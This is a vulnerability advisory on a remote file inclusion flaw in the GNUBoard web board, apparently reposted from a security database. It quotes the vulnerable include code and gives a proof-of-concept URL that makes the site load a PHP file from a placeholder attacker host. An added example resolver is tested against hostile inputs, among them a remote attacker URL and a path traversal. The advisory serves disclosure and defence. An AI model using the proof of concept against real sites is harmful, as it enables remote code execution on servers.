STG Security Advisory: [SSA-20041214-14] GNUBoard PHP injection vulnerability

2004-12-16T00:00:00
ID SECURITYVULNS:DOC:7347
Type securityvulns
Reporter Securityvulns
Modified 2004-12-16T00:00:00

Description


Revision 1.0
Date Published: 2004-12-14 (KST)
Last Update: 2004-12-14
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary

GNUBoard is one of the widely used web BBS applications in Korea. Because of an input validation flaw, a malicious attacker can run arbitrary commands with the privileges of the HTTPD process, which typically runs as the nobody user.

Vulnerability Class

Implementation Error: Input validation flaw

Impact

High : arbitrary command execution.

Affected Products

GNUBoard 3.39 and prior versions
php.ini : register_globals = On

Vendor Status: FIXED

2004-12-06 Vulnerability found.
2004-12-06 GNUBoard developer notified.
2004-12-06 GNUBoard 3.40 is released.
2004-12-14 Official release.

Details

Because the "doc" parameter in "index.php" is not properly validated, it can be exploited to include arbitrary files from external or local resources and execute arbitrary commands.

index.php


    if (!$doc) {                  // (1) <-- check point
        $doc = './main.php';
    }

    // php ??? ??? ??? ? ??
    $tmp = explode(".", $doc);
    $extension = $tmp[count($tmp)-1];
    if (!preg_match("/^(php[3]?|[p]?htm[l]?)$/i", $extension) || count($tmp)<=1) {
        echo "php php3 htm html phtml ??? ??? ? ????.";
        exit;
    }
    ......
    ob_start();
    include $doc;                 // (2) <-- include point


Proof of concept : http://[victim]/gnu3/index.php?doc=http://[attacker]/[attack].php
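
The extension test in index.php is satisfied by any URL that ends in .php, so it does not stop a remote include. As an added example (not GNUBoard code and not the 3.40 patch; resolve_doc(), DEFAULT_DOC and the sample inputs are hypothetical), one way to constrain the include target to local files under a fixed directory:

```php
<?php
// Added example, not GNUBoard code; resolve_doc() and DEFAULT_DOC are hypothetical names.
declare(strict_types=1);

const DEFAULT_DOC = 'main.php';

// Map a user-supplied "doc" value to a real file under $baseDir, or null to refuse it.
function resolve_doc(?string $doc, string $baseDir): ?string
{
    if ($doc === null || $doc === '') {
        $doc = DEFAULT_DOC;
    }
    // Refuse URL schemes and stream wrappers (http://, ftp://, php://, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $doc) || strpos($doc, "\0") !== false) {
        return null;
    }
    // Same extension policy as the original check.
    if (!preg_match('/\.(php3?|p?html?)$/i', $doc)) {
        return null;
    }
    // Canonicalise, then require the result to stay inside $baseDir.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $doc);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// In a request handler, read the value explicitly instead of relying on register_globals:
//   $path = resolve_doc($_GET['doc'] ?? null, __DIR__);
//   if ($path === null) { http_response_code(400); exit; }
//   include $path;

// Constructed demo tree: one page inside the document root, one file outside it.
$root = sys_get_temp_dir() . '/docdemo_' . getmypid();
mkdir("$root/site", 0700, true);
file_put_contents("$root/site/main.php", '');
file_put_contents("$root/outside.php", '');

$samples = [null, 'main.php', 'http://attacker.example/attack.php', '../outside.php', 'main.php.txt'];
foreach ($samples as $in) {
    $out = resolve_doc($in, "$root/site");
    printf("%-40s => %s\n", var_export($in, true), $out === null ? 'refused' : 'include ' . basename($out));
}
```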

Solution

Update to 3.40
http://sir.co.kr/?doc=bbs/gnuboard.php&bo_table=pds&page=1&wr_id=1871

Vendor URL

http://www.sir.co.kr/

Credits

Jeremy Bae at STG Security